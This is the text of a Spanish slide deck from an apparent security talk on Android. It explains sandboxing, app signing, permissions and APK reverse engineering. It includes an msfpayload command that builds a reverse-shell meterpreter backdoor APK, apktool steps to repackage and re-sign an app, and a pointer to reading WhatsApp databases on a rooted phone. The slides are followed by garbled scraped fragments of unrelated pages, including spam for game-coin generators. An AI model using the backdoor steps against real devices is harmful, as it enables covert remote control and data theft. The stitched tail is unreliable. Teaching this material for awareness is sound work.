Conceptos previos sobre Android Principios de la Seguridad • Rooteando el teléfono • Fuentes desconocidas • Aceptación del usuario Ejemplo Backdoor en Android (Metasploit) Proceso de Compilación y Descompilación Ingeniería Inversa en Android - Herramientas Ejemplo Modificación Básica de APK (Caralibro) Ejemplo Obteniendo el código Java (Backdoor) Ejemplo Inyectando Backdoor (Cordoba CF) Conclusiones Agradecimientos @eduSatoe – Blog White Walkers of Hacking
2
Actividad
Es cada una de las pantallas de una aplicación en Android. Cada APK tiene una actividad principal. Estados
de una actividad
Son los diferentes momentos en los cuales se encuentra una actividad. ACTIVA – VISIBLE – PARADA - DESTRUIDA @eduSatoe – Blog White Walkers of Hacking
3
Máquina Virtual
Dalvik
Es una máquina virtual que se usa para los procesos en Android, cada proceso de una APK se ejecuta en una DVM diferente.
@eduSatoe – Blog White Walkers of Hacking
4
¿Puede el usuario matar procesos? El usuario NO tiene permiso para eliminar procesos de memoria. Android es el encargado de liberar memoria, sólo cuando otro proceso lo necesite. Metodología: Android mantiene en memoria todos los procesos que quepan, aunque no se estén ejecutando. ¿Cómo se libera memoria? Se crea una jerarquía de importancia para liberar la memoria. 1. 2. 3. 4. 5.
Se crea un usuario para cada APK que se instala en el sistema.
2.
Toda APK debe estar digitalmente por su autor.
3.
Se establece un modelo de permisos, donde cada acción comprometida que realice una APK debe estar registrada. @eduSatoe – Blog White Walkers of Hacking
firmada
6
Al tener un usuario para cada APK conseguimos restringir el acceso sobre los recursos del sistema. Cada usuario sólo tiene acceso a sus recursos, por tanto sólo él accede a su carpeta de aplicación. Pero todo esto se rompe cuando ROOTEAMOS el teléfono, ya que podemos acceder a cualquier carpeta.
Acceso con ROOT EXPLORER:
/data/data/com.whatsapp/databases/ Ficheros: msgstore,db y wa.db Uso de wforensics.
@eduSatoe – Blog White Walkers of Hacking
7
Toda APK debe estar firmada digitalmente por su autor, de manera que si alguien la modifica no podrá firmarla con el mismo certificado. Todas las aplicaciones de Google Play están firmadas digitalmente con certificados válidos. Pero todo esto se rompe cuando queremos instalar una APK descargada de algún repositorio de aplicaciones gratuitas (Aptoide o BlacMark) para ahorrarnos unos €. Es entonces cuando aceptamos la instalación de Aplicaciones con Fuentes Desconocidas .
@eduSatoe – Blog White Walkers of Hacking
8
Se establece un modelo de permisos, donde cada acción comprometida que realice una APK debe estar registrada. Así el usuario conoce los permisos que va a conceder una APK a la hora de su instalación. Pero todo esto se rompe cuando aceptamos cualquier permiso por tal de obtener la APK. EJEMPLOS PERMISOS Aplicación F
Aplicación B
@eduSatoe – Blog White Walkers of Hacking
9
Haciendo uso de Metasploit es muy fácil crear una backdoor para dispositivos Android.
msfpayload
android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R > backdoor.apk @eduSatoe – Blog White Walkers of Hacking
10
Es muy fácil obtener el código fuente de cualquier APK en Android, el proceso sería el siguiente. PROCESO DE COMPILACIÓN
PROCESO DE DESCOMPILACIÓN o INGENIERÍA INVERSA
@eduSatoe – Blog White Walkers of Hacking
11
Herramientas APKTOOL: herramienta de ingeniería inversa casi perfecta que te devuelve los ficheros originales de los que surgió una aplicación. DEX2JAR: conversión de ficheros .dex a .jar. JD-GUI: descompilador de clases java, que son librerías compiladas en bytecode (un reducido conjunto de instrucciones que aumenta la velocidad de ejecución del código en la máquina virtual) @eduSatoe – Blog White Walkers of Hacking
12
APKTOOL 1. Desempaquetar: apktool d caralibro.apk
2. Modificar código smali, archivos en res o manifiesto. 3. Compilamos: apktool b carpeta aplicacion.apk
4. Creamos almacen de firmas con keytool y firmamos la apk con jarsigner. @eduSatoe – Blog White Walkers of Hacking
13
@eduSatoe – Blog White Walkers of Hacking
14
Existen gran cantidad de Herramientas en la red para proteger nuestro terminales móviles:
Antivirus
Aplicaciones de seguridad avanzadas Conan Mobile
Knox de Samsung
Control de permisos XPrivacy
App Ops
Privacy Guard 2.0
@eduSatoe – Blog White Walkers of Hacking
15
Recordad que la herramienta más potente de seguridad es:
EL USUARIO - Usar el sentido común -
@eduSatoe – Blog White Walkers of Hacking
16
GRACIAS A TODOS !!!! Twitter @eduSatoe Blog White Walkers of Hacking
There was a problem previewing this document. Retrying... Download. Connect more apps... Try one of the apps below to open or edit this item. Hack & Beers ...
showcase their businesses. BY EMILY ... of care might spill over into other areas of your businessâ ... the Associated Press for 11 yearsâto offer some advice.
About 1.5 lakh jobs are expected to be created in the digital marketing space within a couple of. years as more companies tap the Internet and. the social media ...
of skill with words, videos and pictures, and these sites can .... photos that have helped increase CrossFit Mousetrap's social-media presence. ... Page 5 ...
de Stanford, David Filo y Jerry Yang, crearon un directorio de enlaces al que ... El servicio de conexión a Internet. Page 5 of 26. vol2.pdf. vol2.pdf. Open. Extract.
Lots of different information contradicted each ... Africa, information about it still hasn't sunk in with the masses of endurance ... with rowers and track-and-field athletes. Leading up .... Looking back on his career, Whitfield said he believes ma
from the accomplished task. ⢠Facilitate student-to-student interactions and process learners. understanding. Whoops! There was a problem loading this page. Retrying... La seguridad depredadora.pdf. La seguridad depredadora.pdf. Open. Extract. Open
Retrying... Download. Connect more apps... Try one of the apps below to open or edit this item. La seguridad depredadora.pdf. La seguridad depredadora.pdf.
implementation of small. gestures that create. lasting loyalty. Check out the fabulous new GLASKLAR European. website: www.glasklar.com. There's lots great.
Let. them have their own interpretation or personal insights based. from the accomplished task. ⢠Facilitate student-to-student interactions and process learners. understanding. Whoops! There was a problem loading this page. Retrying... Liviu Rebre
... apps below to open or edit this item. manual-sensores-motor-transmision-seguridad-confort- ... ion-velocidad-aceleracion-presion-caudal-gas-mas.pdf.
... the apps below to open or edit this item. manual-operacion-mantenimiento-motoniveladoras-segur ... troles-intervalos-tecnicas-nivelacion-operadores.pdf.
Neco Inc., of Denver, Colorado, provides 3D Computer Aided Design and support services ... Generator Madden Mobile Hack No Survey Kindle Fire Free Game ... Survey Live Free Game Generator Codes on Apple TV, Code Generator ...
Live Free Game Generator Codes online, Free Game Generator Codes Fifa 17 Hack Coins Android CentralCode Generator Fifa 17. Free Coins No Verification ...
Oct 16, 2017 - BDO certifica que los sistemas de información y los servicios reseñados, de. Google Ireland Limited. IE 6388047V. Gordon House, Barrow Street. Dublin 4, Ireland todos ellos de categorÃa ALTA han sido auditados y encontrados conforme
Condiciones a evitar. No aplica. Page 3 of 8. Hoja de Seguridad Thinner Extrafino.pdf. Hoja de Seguridad Thinner Extrafino.pdf. Open. Extract. Open with.